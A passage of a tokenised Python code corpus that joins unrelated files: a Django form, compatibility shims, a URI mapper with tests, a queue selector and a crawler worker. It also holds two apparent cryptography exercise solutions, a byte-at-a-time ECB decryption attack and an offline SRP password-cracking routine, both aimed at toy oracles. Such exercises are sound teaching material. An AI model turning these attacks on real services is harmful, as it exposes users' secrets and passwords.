<NUM_LIT:0> , '<STR_LIT>' ) , ( <NUM_LIT:1> , '<STR_LIT>' ) ) ) ) <EOL> def clean ( self ) : <EOL> if self . cleaned_data [ '<STR_LIT:type>' ] == <NUM_LIT:0> : <EOL> template = '<STR_LIT>' <EOL> elif self . cleaned_data [ '<STR_LIT:type>' ] == <NUM_LIT:1> : <EOL> template = '<STR_LIT>' <EOL> self . cleaned_data [ '<STR_LIT>' ] = template % ( <EOL> self . cleaned_data [ '<STR_LIT:username>' ] , self . cleaned_data [ '<STR_LIT>' ] ) <EOL> return self . cleaned_data <EOL> class Meta : <EOL> model = Remote <EOL> fields = ( '<STR_LIT>' , '<STR_LIT:type>' , '<STR_LIT>' ) </s>
<s> try : <EOL> STRING_TYPES = ( str , unicode ) <EOL> except NameError : <EOL> STRING_TYPES = ( str , ) <EOL> try : <EOL> u = unicode <EOL> except NameError : <EOL> u = str <EOL> b = bytes <EOL> else : <EOL> b = str <EOL> import base64 <EOL> if '<STR_LIT>' in base64 . __dict__ : <EOL> decodebytes = base64 . decodebytes <EOL> encodebytes = base64 . encodebytes <EOL> def decodestring ( value ) : <EOL> return base64 . decodebytes ( bytes ( value , '<STR_LIT:ascii>' ) ) . decode ( '<STR_LIT:ascii>' ) <EOL> def encodestring ( value ) : <EOL> return base64 . encodebytes ( bytes ( value , '<STR_LIT:ascii>' ) ) . decode ( '<STR_LIT:ascii>' ) <EOL> else : <EOL> decodebytes = base64 . decodestring <EOL> encodebytes = base64 . encodestring <EOL> decodestring = base64 . decodestring <EOL> encodestring = base64 . encodestring <EOL> try : <EOL> from urllib . parse import parse_qs <EOL> except ImportError : <EOL> from cgi import parse_qs <EOL> from cgi import parse_qsl <EOL> else : <EOL> from urllib . parse import parse_qsl <EOL> try : <EOL> import ConfigParser <EOL> except ImportError : <EOL> from configparser import ConfigParser <EOL> from configparser import ParsingError <EOL> else : <EOL> from ConfigParser import SafeConfigParser as ConfigParser <EOL> from ConfigParser import ParsingError <EOL> try : <EOL> from Cookie import SimpleCookie <EOL> except ImportError : <EOL> from http . cookies import SimpleCookie <EOL> from http . cookies import CookieError <EOL> else : <EOL> from Cookie import CookieError <EOL> try : <EOL> from itertools import izip_longest <EOL> except ImportError : <EOL> from itertools import zip_longest as izip_longest <EOL> try : <EOL> from StringIO import StringIO <EOL> except ImportError : <EOL> from io import StringIO <EOL> try : <EOL> from urllib import urlencode <EOL> except ImportError : <EOL> from urllib . parse import urlencode <EOL> from urllib . parse import quote as url_quote <EOL> from urllib . parse import unquote as url_unquote <EOL> else : <EOL> from urllib import quote as url_quote <EOL> from urllib import unquote as url_unquote <EOL> try : <EOL> from urlparse import urlparse <EOL> except ImportError : <EOL> from urllib . parse import urlparse <EOL> from urllib . parse import urlunparse <EOL> else : <EOL> from urlparse import urlunparse <EOL> import wsgiref . util <EOL> import wsgiref . headers <EOL> def REQUEST_METHOD ( environ ) : <EOL> return environ [ '<STR_LIT>' ] <EOL> def CONTENT_TYPE ( environ ) : <EOL> return environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def USER_AGENT ( environ ) : <EOL> return environ . get ( '<STR_LIT>' ) <EOL> def AUTHORIZATION ( environ ) : <EOL> return environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def get_cookies ( environ ) : <EOL> header = environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if '<STR_LIT>' in environ : <EOL> cookies , check_header = environ [ '<STR_LIT>' ] <EOL> if check_header == header : <EOL> return cookies <EOL> cookies = SimpleCookie ( ) <EOL> try : <EOL> cookies . load ( header ) <EOL> except CookieError : <EOL> pass <EOL> environ [ '<STR_LIT>' ] = ( cookies , header ) <EOL> return cookies <EOL> def construct_url ( environ ) : <EOL> return wsgiref . util . request_uri ( environ ) <EOL> def header_value ( environ , key ) : <EOL> headers = wsgiref . headers . Headers ( environ ) <EOL> values = headers . get ( key ) <EOL> if not values : <EOL> return "<STR_LIT>" <EOL> if isinstance ( values , list ) : <EOL> return "<STR_LIT:U+002C>" . join ( values ) <EOL> else : <EOL> return values <EOL> def must_decode ( value ) : <EOL> if type ( value ) is b : <EOL> try : <EOL> return value . decode ( '<STR_LIT:utf-8>' ) <EOL> except UnicodeDecodeError : <EOL> return value . decode ( '<STR_LIT>' ) <EOL> return value <EOL> def must_encode ( value ) : <EOL> if type ( value ) is u : <EOL> return value . encode ( '<STR_LIT:utf-8>' ) <EOL> return value </s>
<s> def resolveDotted ( dotted_or_ep ) : <EOL> """<STR_LIT>""" <EOL> from pkg_resources import EntryPoint <EOL> return EntryPoint . parse ( '<STR_LIT>' % dotted_or_ep ) . load ( False ) </s>
<s> from prob11 import generateAESKey <EOL> from prob9 import addPKCS7Padding <EOL> from prob10 import aes_ecb_enc <EOL> from prob1 import base64toRaw <EOL> from prob8 import chunks <EOL> global_aes_key = generateAESKey ( ) ; <EOL> def constant_ecb_encrypt ( rawInput ) : <EOL> return aes_ecb_enc ( addPKCS7Padding ( rawInput , <NUM_LIT:16> ) , global_aes_key ) ; <EOL> def append_and_encrypt ( rawInput ) : <EOL> unknownB64 = b'<STR_LIT>' + b'<STR_LIT>' + b'<STR_LIT>' + b'<STR_LIT>' <EOL> unknownRaw = base64toRaw ( unknownB64 ) ; <EOL> return constant_ecb_encrypt ( rawInput + unknownRaw ) ; <EOL> def determineBlockSize ( ) : <EOL> plaintext = b'<STR_LIT>' ; <EOL> size1 = len ( append_and_encrypt ( plaintext ) ) ; <EOL> plaintext += b'<STR_LIT:A>' ; <EOL> size2 = len ( append_and_encrypt ( plaintext ) ) ; <EOL> while ( size1 == size2 ) : <EOL> plaintext += b'<STR_LIT:A>' ; <EOL> size2 = len ( append_and_encrypt ( plaintext ) ) ; <EOL> return ( size2 - size1 ) ; <EOL> def determinePlaintextLength ( ) : <EOL> plaintext = b'<STR_LIT>' ; <EOL> emptyCipherLength = len ( append_and_encrypt ( plaintext ) ) ; <EOL> maxPlaintextLength = emptyCipherLength - <NUM_LIT:1> ; <EOL> while ( True ) : <EOL> plaintext += b'<STR_LIT:A>' ; <EOL> thisCipherLength = len ( append_and_encrypt ( plaintext ) ) ; <EOL> if ( thisCipherLength == emptyCipherLength ) : <EOL> maxPlaintextLength -= <NUM_LIT:1> ; <EOL> else : <EOL> return maxPlaintextLength ; <EOL> def detectMode ( ) : <EOL> plaintext = b'<STR_LIT:A>' * <NUM_LIT> ; <EOL> cipher = append_and_encrypt ( plaintext ) ; <EOL> blocks = chunks ( cipher , <NUM_LIT:16> ) ; <EOL> if ( blocks [ <NUM_LIT:1> ] == blocks [ <NUM_LIT:2> ] ) : <EOL> return "<STR_LIT>" ; <EOL> else : <EOL> return "<STR_LIT>" ; <EOL> padStr = b'<STR_LIT:A>' ; <EOL> def determineNextByte ( rawPrefix , observedCipher ) : <EOL> '''<STR_LIT>''' <EOL> blockSize = determineBlockSize ( ) <EOL> plain = ( padStr ) * ( blockSize - <NUM_LIT:1> - len ( rawPrefix ) ) ; <EOL> plain += rawPrefix ; <EOL> for i in range ( <NUM_LIT> ) : <EOL> thisPlain = plain + bytes ( chr ( i ) , '<STR_LIT>' ) ; <EOL> thisCipher = append_and_encrypt ( thisPlain ) ; <EOL> if ( chunks ( thisCipher , blockSize ) [ <NUM_LIT:0> ] == observedCipher ) : <EOL> return bytes ( chr ( i ) , '<STR_LIT>' ) ; <EOL> return b'<STR_LIT>' ; <EOL> def determinePlaintext ( ) : <EOL> blockSize = determineBlockSize ( ) <EOL> plaintextLength = determinePlaintextLength ( ) ; <EOL> knownPlaintext = b'<STR_LIT>' ; <EOL> for i in range ( plaintextLength ) : <EOL> padLen = ( blockSize - <NUM_LIT:1> ) - ( len ( knownPlaintext ) % blockSize ) ; <EOL> pad = padStr * padLen ; <EOL> cipherOutput = append_and_encrypt ( pad ) ; <EOL> blockOfInterest = len ( knownPlaintext ) // <NUM_LIT:16> ; <EOL> cipherChunks = chunks ( cipherOutput , blockSize ) ; <EOL> cipherOfInterest = cipherChunks [ blockOfInterest ] ; <EOL> prefix = ( pad + knownPlaintext ) [ - <NUM_LIT:15> : ] ; <EOL> knownPlaintext += determineNextByte ( prefix , cipherOfInterest ) ; <EOL> return knownPlaintext ; <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> print ( "<STR_LIT>" + str ( determineBlockSize ( ) ) ) ; <EOL> print ( "<STR_LIT>" + detectMode ( ) ) ; <EOL> print ( "<STR_LIT>" + str ( determinePlaintext ( ) ) ) ; </s>
<s> from prob36 import SRP_step1 , SRP_step2 , myhmac , SRP_init <EOL> from random import randrange <EOL> from prob33 import mypow , intToBytes <EOL> from hashlib import sha256 <EOL> simplified_SRP_step1 = SRP_step1 ; <EOL> simplified_SRP_step2 = SRP_step2 ; <EOL> def simplified_SRP_step3 ( state ) : <EOL> state [ "<STR_LIT:b>" ] = randrange ( <NUM_LIT:2> , state [ "<STR_LIT:p>" ] - <NUM_LIT:2> ) ; <EOL> state [ "<STR_LIT:B>" ] = mypow ( state [ "<STR_LIT:g>" ] , state [ "<STR_LIT:b>" ] , state [ "<STR_LIT:p>" ] ) ; <EOL> state [ "<STR_LIT:u>" ] = randrange ( <NUM_LIT:2> , <NUM_LIT:2> ** <NUM_LIT> ) ; <EOL> return state ; <EOL> def simplified_SRP_step4 ( state ) : <EOL> x = sha256 ( intToBytes ( state [ "<STR_LIT>" ] ) + state [ "<STR_LIT:P>" ] ) . hexdigest ( ) ; <EOL> S = mypow ( state [ "<STR_LIT:B>" ] , state [ "<STR_LIT:a>" ] + state [ "<STR_LIT:u>" ] * int ( x , <NUM_LIT:16> ) , state [ "<STR_LIT:p>" ] ) ; <EOL> state [ "<STR_LIT>" ] = sha256 ( intToBytes ( S ) ) . digest ( ) ; <EOL> return state ; <EOL> def simplified_SRP_step5 ( state ) : <EOL> S = mypow ( state [ "<STR_LIT:A>" ] * mypow ( state [ "<STR_LIT:v>" ] , state [ "<STR_LIT:u>" ] , state [ "<STR_LIT:p>" ] ) , state [ "<STR_LIT:b>" ] , state [ "<STR_LIT:p>" ] ) ; <EOL> state [ "<STR_LIT>" ] = sha256 ( intToBytes ( S ) ) . digest ( ) ; <EOL> return state ; <EOL> def simplified_SRP_step6 ( state ) : <EOL> state [ "<STR_LIT>" ] = myhmac ( sha256 , state [ "<STR_LIT>" ] , intToBytes ( state [ "<STR_LIT>" ] ) ) ; <EOL> return state ; <EOL> def simplified_SRP_validate ( state ) : <EOL> expected = myhmac ( sha256 , state [ "<STR_LIT>" ] , intToBytes ( state [ "<STR_LIT>" ] ) ) ; <EOL> return expected == state [ "<STR_LIT>" ] ; <EOL> def test_simplified_SRP ( ) : <EOL> state = SRP_init ( ) ; <EOL> state = simplified_SRP_step1 ( state ) ; <EOL> state = simplified_SRP_step2 ( state ) ; <EOL> state = simplified_SRP_step3 ( state ) ; <EOL> state = simplified_SRP_step4 ( state ) ; <EOL> state = simplified_SRP_step5 ( state ) ; <EOL> state = simplified_SRP_step6 ( state ) ; <EOL> assert ( simplified_SRP_validate ( state ) ) ; <EOL> '''<STR_LIT>''' <EOL> def run_simplified_SRP_MITM ( ) : <EOL> state = SRP_init ( ) ; <EOL> state = simplified_SRP_step1 ( state ) ; <EOL> state = simplified_SRP_step2 ( state ) ; <EOL> state = simplified_SRP_step3 ( state ) ; <EOL> state = simplified_SRP_step4 ( state ) ; <EOL> state = simplified_SRP_step5 ( state ) ; <EOL> state = simplified_SRP_step6 ( state ) ; <EOL> return state ; <EOL> def try_simplified_SRP_password ( state , guess ) : <EOL> x = sha256 ( intToBytes ( state [ "<STR_LIT>" ] ) + guess ) . hexdigest ( ) ; <EOL> v = mypow ( state [ "<STR_LIT:g>" ] , int ( x , <NUM_LIT:16> ) , state [ "<STR_LIT:p>" ] ) ; <EOL> v_u = mypow ( v , state [ "<STR_LIT:u>" ] , state [ "<STR_LIT:p>" ] ) ; <EOL> S = mypow ( state [ "<STR_LIT:A>" ] * v_u , state [ "<STR_LIT:b>" ] , state [ "<STR_LIT:p>" ] ) ; <EOL> mychal = myhmac ( sha256 , sha256 ( intToBytes ( S ) ) . digest ( ) , intToBytes ( state [ "<STR_LIT>" ] ) ) ; <EOL> return mychal == state [ "<STR_LIT>" ] ; <EOL> def crack_simplified_SRP ( ) : <EOL> state = run_simplified_SRP_MITM ( ) ; <EOL> pw_guess_list = [ b'<STR_LIT>' , b'<STR_LIT>' , state [ "<STR_LIT:P>" ] , b'<STR_LIT>' ] <EOL> success = False ; <EOL> pw = None ; <EOL> for guess in pw_guess_list : <EOL> if ( try_simplified_SRP_password ( state , guess ) ) : <EOL> success = True ; <EOL> pw = guess ; <EOL> assert ( success ) ; <EOL> assert ( pw == state [ "<STR_LIT:P>" ] ) ; <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> test_simplified_SRP ( ) ; <EOL> crack_simplified_SRP ( ) ; <EOL> print ( "<STR_LIT>" ) ; </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import os . path <EOL> import re <EOL> try : <EOL> from urllib . parse import urlparse <EOL> except ImportError : <EOL> from urlparse import urlparse <EOL> import logging <EOL> class MapperError ( Exception ) : <EOL> pass <EOL> class Mapper ( ) : <EOL> def __init__ ( self , mappings = None , use_default_path = False ) : <EOL> self . logger = logging . getLogger ( '<STR_LIT>' ) <EOL> self . mappings = [ ] <EOL> if ( mappings ) : <EOL> self . parse ( mappings , use_default_path ) <EOL> def __len__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return ( len ( self . mappings ) ) <EOL> def parse ( self , mappings , use_default_path = False ) : <EOL> """<STR_LIT>""" <EOL> if ( use_default_path and <EOL> len ( mappings ) == <NUM_LIT:1> and <EOL> re . search ( r"<STR_LIT:=>" , mappings [ <NUM_LIT:0> ] ) == None ) : <EOL> path = self . path_from_uri ( mappings [ <NUM_LIT:0> ] ) <EOL> self . logger . warning ( "<STR_LIT>" % ( mappings [ <NUM_LIT:0> ] , path ) ) <EOL> self . mappings . append ( Map ( mappings [ <NUM_LIT:0> ] , path ) ) <EOL> elif ( len ( mappings ) == <NUM_LIT:2> and <EOL> re . search ( r"<STR_LIT:=>" , mappings [ <NUM_LIT:0> ] ) == None and <EOL> re . search ( r"<STR_LIT:=>" , mappings [ <NUM_LIT:1> ] ) == None ) : <EOL> self . mappings . append ( Map ( mappings [ <NUM_LIT:0> ] , mappings [ <NUM_LIT:1> ] ) ) <EOL> else : <EOL> for mapping in mappings : <EOL> l = mapping . split ( '<STR_LIT:=>' ) <EOL> if ( len ( l ) != <NUM_LIT:2> ) : <EOL> raise MapperError ( "<STR_LIT>" % ( mapping , str ( l ) ) ) <EOL> ( src_uri , dst_path ) = l <EOL> for map in self . mappings : <EOL> if ( src_uri == map . src_uri ) : <EOL> raise MapperError ( "<STR_LIT>" % ( src_uri , dst_path ) ) <EOL> if ( dst_path == map . dst_path ) : <EOL> raise MapperError ( "<STR_LIT>" % ( dst_path , src_uri ) ) <EOL> self . mappings . append ( Map ( src_uri , dst_path ) ) <EOL> def default_src_uri ( self ) : <EOL> """<STR_LIT>""" <EOL> if ( len ( self . mappings ) > <NUM_LIT:0> ) : <EOL> return ( self . mappings [ <NUM_LIT:0> ] . src_uri ) <EOL> raise MapperError ( "<STR_LIT>" ) <EOL> def unsafe ( self ) : <EOL> """<STR_LIT>""" <EOL> for map in self . mappings : <EOL> if ( map . unsafe ( ) ) : <EOL> return ( True ) <EOL> return ( False ) <EOL> def dst_to_src ( self , dst_file ) : <EOL> """<STR_LIT>""" <EOL> for map in self . mappings : <EOL> src_uri = map . dst_to_src ( dst_file ) <EOL> if ( src_uri is not None ) : <EOL> return ( src_uri ) <EOL> raise MapperError ( "<STR_LIT>" % ( dst_file ) ) <EOL> def src_to_dst ( self , src_uri ) : <EOL> """<STR_LIT>""" <EOL> for map in self . mappings : <EOL> dst_path = map . src_to_dst ( src_uri ) <EOL> if ( dst_path is not None ) : <EOL> return ( dst_path ) <EOL> raise MapperError ( "<STR_LIT>" % ( src_uri ) ) <EOL> def path_from_uri ( self , uri ) : <EOL> """<STR_LIT>""" <EOL> ( scheme , netloc , path , params , query , fragment ) = urlparse ( uri ) <EOL> if ( netloc == '<STR_LIT>' ) : <EOL> return ( uri ) <EOL> path = '<STR_LIT:/>' . join ( [ netloc , path ] ) <EOL> path = re . sub ( '<STR_LIT>' , '<STR_LIT:_>' , path ) <EOL> path = re . sub ( '<STR_LIT>' , '<STR_LIT:_>' , path ) <EOL> path = re . sub ( '<STR_LIT>' , '<STR_LIT>' , path ) <EOL> path = re . sub ( '<STR_LIT>' , '<STR_LIT>' , path ) <EOL> return ( path ) <EOL> def __repr__ ( self ) : <EOL> s = '<STR_LIT>' % ( len ( self . mappings ) ) <EOL> for map in self . mappings : <EOL> s += str ( map ) + '<STR_LIT:\n>' <EOL> return ( s ) <EOL> class Map : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , src_uri = None , dst_path = None ) : <EOL> self . src_uri = self . strip_trailing_slashes ( src_uri ) <EOL> self . dst_path = self . strip_trailing_slashes ( dst_path ) <EOL> def strip_trailing_slashes ( self , path ) : <EOL> """<STR_LIT>""" <EOL> m = re . match ( r"<STR_LIT>" , path ) <EOL> if ( m is None ) : <EOL> return ( path ) <EOL> return ( m . group ( <NUM_LIT:1> ) ) <EOL> def dst_to_src ( self , dst_file ) : <EOL> """<STR_LIT>""" <EOL> m = re . match ( self . dst_path + "<STR_LIT>" , dst_file ) <EOL> if ( m is None ) : <EOL> return ( None ) <EOL> rel_path = m . group ( <NUM_LIT:1> ) <EOL> return ( self . src_uri + '<STR_LIT:/>' + rel_path ) <EOL> def src_to_dst ( self , src_uri ) : <EOL> """<STR_LIT>""" <EOL> m = re . match ( self . src_uri + "<STR_LIT>" , src_uri ) <EOL> if ( m is None ) : <EOL> return ( None ) <EOL> rel_path = m . group ( <NUM_LIT:1> ) <EOL> return ( self . dst_path + '<STR_LIT:/>' + rel_path ) <EOL> def unsafe ( self ) : <EOL> """<STR_LIT>""" <EOL> ( scheme , netloc , path , params , query , fragment ) = urlparse ( self . src_uri ) <EOL> if ( scheme != '<STR_LIT>' ) : <EOL> return ( False ) <EOL> s = os . path . normpath ( self . src_uri ) <EOL> d = os . path . normpath ( self . dst_path ) <EOL> lcp = os . path . commonprefix ( [ s , d ] ) <EOL> return ( s == lcp or d == lcp ) <EOL> def __repr__ ( self ) : <EOL> return ( "<STR_LIT>" % ( self . src_uri , self . dst_path ) ) </s>
<s> import unittest <EOL> from resync . mapper import Mapper , MapperError , Map <EOL> class TestMapper ( unittest . TestCase ) : <EOL> def test00_mapper_creation ( self ) : <EOL> m1 = Mapper ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( len ( m1 ) , <NUM_LIT:1> ) <EOL> m2 = Mapper ( mappings = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( len ( m2 ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( str ( m1 ) , str ( m2 ) ) <EOL> m3 = Mapper ( [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( len ( m3 ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( str ( m1 ) , str ( m3 ) ) <EOL> m4 = Mapper ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> m5 = Mapper ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( len ( m4 ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( len ( m5 ) , <NUM_LIT:2> ) <EOL> self . assertNotEqual ( str ( m4 ) , str ( m5 ) ) <EOL> def test01_mapper_src_to_dst ( self ) : <EOL> m = Mapper ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( m . src_to_dst ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . src_to_dst ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . src_to_dst ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . src_to_dst ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertRaises ( MapperError , m . src_to_dst , '<STR_LIT>' ) <EOL> self . assertRaises ( MapperError , m . src_to_dst , '<STR_LIT>' ) <EOL> self . assertRaises ( MapperError , m . src_to_dst , '<STR_LIT>' ) <EOL> def test02_mapper_dst_to_src ( self ) : <EOL> m = Mapper ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( m . dst_to_src ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . dst_to_src ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . dst_to_src ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertRaises ( MapperError , m . dst_to_src , '<STR_LIT>' ) <EOL> self . assertRaises ( MapperError , m . dst_to_src , '<STR_LIT>' ) <EOL> self . assertRaises ( MapperError , m . dst_to_src , '<STR_LIT>' ) <EOL> def test03_mapper2_src_to_dst ( self ) : <EOL> m = Mapper ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( m . src_to_dst ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . src_to_dst ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . src_to_dst ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . src_to_dst ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> def test04_mapper2_dst_to_src ( self ) : <EOL> m = Mapper ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( m . dst_to_src ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . dst_to_src ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . dst_to_src ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . dst_to_src ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> def test05_path_from_uri ( self ) : <EOL> m = Mapper ( ) <EOL> self . assertEqual ( m . path_from_uri ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . path_from_uri ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . path_from_uri ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . path_from_uri ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . path_from_uri ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . path_from_uri ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . path_from_uri ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . path_from_uri ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . path_from_uri ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> def test06_mapper_unsafe ( self ) : <EOL> self . assertFalse ( Mapper ( [ '<STR_LIT>' ] ) . unsafe ( ) ) <EOL> self . assertFalse ( Mapper ( [ '<STR_LIT>' ] ) . unsafe ( ) ) <EOL> self . assertFalse ( Mapper ( [ '<STR_LIT>' ] , use_default_path = True ) . unsafe ( ) ) <EOL> self . assertTrue ( Mapper ( [ '<STR_LIT>' ] , use_default_path = True ) . unsafe ( ) ) <EOL> self . assertTrue ( Mapper ( [ '<STR_LIT>' , '<STR_LIT>' ] ) . unsafe ( ) ) <EOL> def test07_default_src_uri ( self ) : <EOL> self . assertEqual ( Mapper ( [ '<STR_LIT>' ] ) . default_src_uri ( ) , '<STR_LIT:a>' ) <EOL> self . assertEqual ( Mapper ( [ '<STR_LIT>' , '<STR_LIT>' ] ) . default_src_uri ( ) , '<STR_LIT:a>' ) <EOL> self . assertRaises ( MapperError , Mapper ( ) . default_src_uri ) <EOL> def test10_map_unsafe ( self ) : <EOL> self . assertFalse ( Map ( '<STR_LIT>' , '<STR_LIT:path>' ) . unsafe ( ) ) <EOL> self . assertFalse ( Map ( '<STR_LIT>' , '<STR_LIT>' ) . unsafe ( ) ) <EOL> self . assertFalse ( Map ( '<STR_LIT:a>' , '<STR_LIT:b>' ) . unsafe ( ) ) <EOL> self . assertFalse ( Map ( '<STR_LIT>' , '<STR_LIT>' ) . unsafe ( ) ) <EOL> self . assertTrue ( Map ( '<STR_LIT:path>' , '<STR_LIT:path>' ) . unsafe ( ) ) <EOL> self . assertTrue ( Map ( '<STR_LIT>' , '<STR_LIT:path>' ) . unsafe ( ) ) <EOL> self . assertTrue ( Map ( '<STR_LIT:path>' , '<STR_LIT>' ) . unsafe ( ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> suite = unittest . defaultTestLoader . loadTestsFromTestCase ( TestMapper ) <EOL> unittest . TextTestRunner ( verbosity = <NUM_LIT:2> ) . run ( suite ) </s>
<s> """<STR_LIT>""" <EOL> import random <EOL> class BiasedQueueSelector ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , number_of_queues ) : <EOL> """<STR_LIT>""" <EOL> self . _weights = [ ] <EOL> self . _sum_weights = <NUM_LIT:0> <EOL> self . _enumerate_weights = [ ] <EOL> self . reset_queues ( number_of_queues ) <EOL> def reset_queues ( self , number_of_queues ) : <EOL> self . _weights = [ <NUM_LIT:1> / ( float ( i ) * number_of_queues ) <EOL> for i in range ( <NUM_LIT:1> , number_of_queues + <NUM_LIT:1> ) ] <EOL> self . _sum_weights = sum ( self . _weights ) <EOL> self . _enumerate_weights = [ ( i , w ) for i , w in enumerate ( self . _weights ) ] <EOL> def get_queue ( self ) : <EOL> """<STR_LIT>""" <EOL> random_weight = random . random ( ) * self . _sum_weights <EOL> for ( i , weight ) in self . _enumerate_weights : <EOL> random_weight -= weight <EOL> if random_weight < <NUM_LIT:0> : <EOL> return i </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import os <EOL> import signal <EOL> import socket <EOL> import traceback <EOL> import zmq <EOL> from zmq . core . error import ZMQError <EOL> from zmq . eventloop . ioloop import IOLoop , DelayedCallback <EOL> from zmq . log . handlers import PUBHandler <EOL> from spyder . import_util import import_class <EOL> from spyder . core . constants import ZMQ_SPYDER_MGMT_WORKER <EOL> from spyder . core . constants import ZMQ_SPYDER_MGMT_WORKER_AVAIL <EOL> from spyder . core . constants import ZMQ_SPYDER_MGMT_WORKER_QUIT <EOL> from spyder . core . constants import ZMQ_SPYDER_MGMT_WORKER_QUIT_ACK <EOL> from spyder . core . messages import MgmtMessage <EOL> from spyder . core . mgmt import ZmqMgmt <EOL> from spyder . core . worker import ZmqWorker , AsyncZmqWorker <EOL> from spyder . processor . fetcher import FetchProcessor <EOL> def create_worker_management ( settings , zmq_context , io_loop ) : <EOL> """<STR_LIT>""" <EOL> listening_socket = zmq_context . socket ( zmq . SUB ) <EOL> listening_socket . setsockopt ( zmq . SUBSCRIBE , "<STR_LIT>" ) <EOL> listening_socket . connect ( settings . ZEROMQ_MGMT_MASTER ) <EOL> publishing_socket = zmq_context . socket ( zmq . PUB ) <EOL> publishing_socket . connect ( settings . ZEROMQ_MGMT_WORKER ) <EOL> return ZmqMgmt ( listening_socket , publishing_socket , io_loop = io_loop ) <EOL> def create_worker_fetcher ( settings , mgmt , zmq_context , log_handler , io_loop ) : <EOL> """<STR_LIT>""" <EOL> pulling_socket = zmq_context . socket ( zmq . PULL ) <EOL> pulling_socket . connect ( settings . ZEROMQ_WORKER_PROC_FETCHER_PULL ) <EOL> pushing_socket = zmq_context . socket ( zmq . PUSH ) <EOL> pushing_socket . setsockopt ( zmq . HWM , <EOL> settings . ZEROMQ_WORKER_PROC_FETCHER_PUSH_HWM ) <EOL> pushing_socket . bind ( settings . ZEROMQ_WORKER_PROC_FETCHER_PUSH ) <EOL> fetcher = FetchProcessor ( settings , io_loop ) <EOL> return AsyncZmqWorker ( pulling_socket , pushing_socket , mgmt , fetcher , <EOL> log_handler , settings . LOG_LEVEL_WORKER , io_loop ) <EOL> def create_processing_function ( settings , pipeline ) : <EOL> """<STR_LIT>""" <EOL> processors = [ ] <EOL> for processor in pipeline : <EOL> processor_class = import_class ( processor ) <EOL> processors . append ( processor_class ( settings ) ) <EOL> def processing ( data_message ) : <EOL> """<STR_LIT>""" <EOL> next_message = data_message <EOL> for processor in processors : <EOL> next_message = processor ( next_message ) <EOL> return next_message <EOL> return processing <EOL> def create_worker_extractor ( settings , mgmt , zmq_context , log_handler , io_loop ) : <EOL> """<STR_LIT>""" <EOL> pipeline = settings . SPYDER_EXTRACTOR_PIPELINE <EOL> pipeline . extend ( settings . SPYDER_SCOPER_PIPELINE ) <EOL> processing = create_processing_function ( settings , pipeline ) <EOL> pulling_socket = zmq_context . socket ( zmq . PULL ) <EOL> pulling_socket . connect ( settings . ZEROMQ_WORKER_PROC_EXTRACTOR_PULL ) <EOL> pushing_socket = zmq_context . socket ( zmq . PUB ) <EOL> pushing_socket . setsockopt ( zmq . HWM , <EOL> settings . ZEROMQ_WORKER_PROC_EXTRACTOR_PUB_HWM ) <EOL> pushing_socket . connect ( settings . ZEROMQ_WORKER_PROC_EXTRACTOR_PUB ) <EOL> return ZmqWorker ( pulling_socket , pushing_socket , mgmt , processing , <EOL> log_handler , settings . LOG_LEVEL_WORKER , io_loop = io_loop ) <EOL> def main ( settings ) : <EOL> """<STR_LIT>""" <EOL> identity = "<STR_LIT>" % ( socket . gethostname ( ) , os . getpid ( ) ) <EOL> ctx = zmq . Context ( ) <EOL> io_loop = IOLoop . instance ( ) <EOL> log_pub = ctx . socket ( zmq . PUB ) <EOL> log_pub . connect ( settings . ZEROMQ_LOGGING ) <EOL> 